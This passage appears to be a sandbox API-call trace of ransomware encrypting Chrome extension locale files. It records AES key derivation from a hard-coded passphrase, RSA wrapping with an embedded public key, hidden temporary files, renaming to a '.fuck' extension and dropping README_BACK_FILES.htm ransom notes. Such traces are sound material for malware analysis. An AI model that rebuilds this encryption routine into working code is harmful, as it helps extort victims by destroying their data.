[0255.626] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.626] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.629] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.629] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.629] CryptHashData (hHash=0x2e18828, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.629] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.629] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.629] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.629] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e122b0) returned 1 [0255.630] CryptImportPublicKeyInfo (in: hCryptProv=0x2e122b0, dwCertEncodingType=0x1, pInfo=0x2e2a310*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2a340*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2a348*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18ee8) returned 1 [0255.630] CryptEncrypt (in: hKey=0x2e18ee8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.630] CryptEncrypt (in: hKey=0x2e18ee8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e12cc8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e12cc8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.630] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e12cc8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e12cc8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.632] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x104, lpOverlapped=0x0) returned 1 [0255.633] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x104, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0255.633] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0255.633] CloseHandle (hObject=0x5d5c) returned 1 [0255.633] CloseHandle (hObject=0x5d60) returned 1 [0255.633] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json"), bFailIfExists=0) returned 1 [0255.638] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json", dwFileAttributes=0x0) returned 1 [0255.638] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.gsg")) returned 1 [0255.640] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.fuck")) returned 1 [0255.642] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.642] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.642] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.642] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.642] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.642] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\readme_back_files.htm")) returned 0xffffffff [0255.642] AreFileApisANSI () returned 1 [0255.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.643] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.643] GetFileType (hFile=0x5d50) returned 0x1 [0255.643] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.645] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.645] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.646] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.646] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.646] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.646] GetLastError () returned 0x0 [0255.646] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json")) returned 0x20 [0255.646] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json", dwFileAttributes=0x80) returned 1 [0255.647] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.648] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.649] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.649] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.652] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.652] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.652] CryptHashData (hHash=0x2e18828, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.652] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.652] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.652] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.652] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e12ee8) returned 1 [0255.653] CryptImportPublicKeyInfo (in: hCryptProv=0x2e12ee8, dwCertEncodingType=0x1, pInfo=0x2e2a3e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2a410*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2a418*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18be8) returned 1 [0255.653] CryptEncrypt (in: hKey=0x2e18be8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.653] CryptEncrypt (in: hKey=0x2e18be8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e12b30*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e12b30*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.654] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e12b30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e12b30*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.655] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0255.657] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0255.657] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0255.657] CloseHandle (hObject=0x5d60) returned 1 [0255.657] CloseHandle (hObject=0x5d5c) returned 1 [0255.657] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json"), bFailIfExists=0) returned 1 [0255.661] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json", dwFileAttributes=0x0) returned 1 [0255.662] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.gsg")) returned 1 [0255.664] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.fuck")) returned 1 [0255.665] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.665] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.665] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.665] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.665] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.666] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\readme_back_files.htm")) returned 0xffffffff [0255.666] AreFileApisANSI () returned 1 [0255.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.666] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.667] GetFileType (hFile=0x5d50) returned 0x1 [0255.667] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.669] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.669] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.670] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.670] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.670] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.670] GetLastError () returned 0x0 [0255.670] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json")) returned 0x20 [0255.670] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json", dwFileAttributes=0x80) returned 1 [0255.671] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.672] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.673] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.673] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.676] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.676] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.676] CryptHashData (hHash=0x2e180e8, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.676] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e180e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.676] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.676] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.676] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e124d0) returned 1 [0255.677] CryptImportPublicKeyInfo (in: hCryptProv=0x2e124d0, dwCertEncodingType=0x1, pInfo=0x2e292d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e29300*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e29308*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19068) returned 1 [0255.677] CryptEncrypt (in: hKey=0x2e19068, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.677] CryptEncrypt (in: hKey=0x2e19068, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e12bb8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e12bb8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.677] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e12bb8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e12bb8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.679] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xc4, lpOverlapped=0x0) returned 1 